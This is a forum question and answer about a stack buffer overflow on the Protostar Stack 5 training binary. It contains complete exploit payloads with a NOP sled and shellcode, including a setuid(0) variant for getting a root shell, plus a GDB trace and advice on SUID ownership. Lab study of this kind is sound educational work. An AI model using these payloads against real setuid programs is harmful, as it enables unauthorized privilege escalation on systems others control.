Why SUID Shellcode not working but Basic Shellcode working?

Question

I'm playing with Basic Buffer Overflow Protostar - Stack 5

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

//gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -m32 -g bof2.c -o bof2
//sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'


int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

Then I try simple shellcode http://shell-storm.org/shellcode/files/shellcode-811.php

So final payload looks like this

(python -c "print 'A'*72+'\xf4\xd1\xff\xff'+'\x90'*200+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'"; tee) | ./protostar-stack5

It works like expected, so when I type id in STDIN then STDOUT will be my current id and so on.

Now I want to try shellcode with SETUID(0) here is the link http://shell-storm.org/shellcode/files/shellcode-598.php

so my final payload will be

(python -c "print 'A'*72+'\xf4\xd1\xff\xff'+'\x90'*200+'\x31\xdb\x8d\x43\x17\xcd\x80\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'"; tee) | ./protostar-stack5

When I type id in STDIN I got Segmentation Fault

So I decide to check by step into from NOP to Shellcode inside GDB

   0xffffd235:  nop
   0xffffd236:  nop
   0xffffd237:  nop
=> 0xffffd238:  xor    ebx,ebx ; Start of Shellcode
   0xffffd23a:  lea    eax,[ebx+0x17]
   0xffffd23d:  int    0x80
   0xffffd23f:  push   ebx
   0xffffd240:  push   0x68732f6e
   0xffffd245:  push   0x69622f2f
   0xffffd24a:  mov    ebx,esp
   0xffffd24c:  push   eax
   0xffffd24d:  push   ebx
   0xffffd24e:  mov    ecx,esp
   0xffffd250:  cdq    
   0xffffd251:  mov    al,0xb
=> 0xffffd253:  int    0x80  ; End Of Shellcode
   0xffffd255:  add    bh,bh ; Still executed
   0xffffd257:  dec    DWORD PTR [ebx-0x25] ; Still executed
   0xffffd25a:  (bad)  ; Still executed, this cause Segmentation fault
   0xffffd25b:  jmp    DWORD PTR [edx-0x25]
   0xffffd25e:  (bad)  
   0xffffd25f:  push   DWORD PTR [ebx+ebx*8-0x1]

Legend: code, data, rodata, value
Stopped reason: SIGILL
0xffffd25a in ?? ()

I step into from start of shellcode till the end of shellcode, I got no error but shell doesn't appear and it still execute instruction after the end of shellcode then it will be Segmentation Fault in the end

I have already set SUID Bit in compiled program.

So Why I got Segmentation Fault instead of executing shell?

Why instruction after INT 80 still executed, it's different with basic shellcode which give me shell after INT 80 executed?

What should I do to make my payload which containt SETUID(0) work like expected?

PS : I Want to ask it, fortunately it work by the end of writing question. Any other answer is welcome.

Thanks in advance.

Answer 1

Don't forget to set compiled program owner as root sudo chown root ./filename and don't forget to set SUID bit chmod u+s ./filename, because your payload contain SETUID(0)